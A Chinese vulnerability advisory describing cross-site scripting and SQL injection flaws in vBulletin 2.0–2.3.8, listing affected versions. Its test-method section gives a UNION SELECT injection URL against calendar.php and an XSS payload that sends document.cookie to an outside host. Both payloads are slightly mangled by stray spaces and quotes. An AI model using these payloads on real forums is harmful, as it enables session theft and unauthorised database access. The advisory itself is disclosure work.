vBulletin 2.3跨站脚本和SQL注入漏洞

漏洞起因
输入验证错误
危险等级
低

影响系统
VBulletin VBulletin 2.3.8
VBulletin VBulletin 2.3.4
VBulletin VBulletin 2.3.3
VBulletin VBulletin 2.3.2
VBulletin VBulletin 2.3 .0
VBulletin VBulletin 2.2.9
VBulletin VBulletin 2.2.8
VBulletin VBulletin 2.2.7
VBulletin VBulletin 2.2.6
VBulletin VBulletin 2.2.5
VBulletin VBulletin 2.2.4
VBulletin VBulletin 2.2.3
VBulletin VBulletin 2.2.2
VBulletin VBulletin 2.2.1
VBulletin VBulletin 2.2 .0
VBulletin VBulletin 2.0.3
VBulletin VBulletin 2.0 rc 3
VBulletin VBulletin 2.0 rc 2

不受影响系统

危害
远程攻击者可利用漏洞获得敏感信息。

攻击所需条件
攻击者必须访问VBulletin。

漏洞信息
VBulletin是一款基于PHP的WEB论坛程序。
VBulletin存在跨站脚本和SQL注入漏洞，远程攻击者可以利用漏洞获得敏感信息或操作数据库。

测试方法
www.example.com/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, ‘0000-0-0 ‘, version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
[E * MAIL] aaa@aaa.aa ? ‘s =’ [/ E * MAIL] ‘sss =? i = new Image (); i.src =’ http://www.example.com/cgi-bin/s . jpg? ‘+ document.cookie; this.sss = null ?style = top: expression (eval (this.sss));

厂商解决方案
目前没有解决方案提供：
http://www.vbulletin.com/

漏洞提供者
ROOT_EGY

← Adobe BlazeDS信息泄漏漏洞

Avast!杀毒软件aavmKer4.sys驱动IOCTL处理本地权限提升漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

vBulletin 2.3跨站脚本和SQL注入漏洞

0 条评论。

发表评论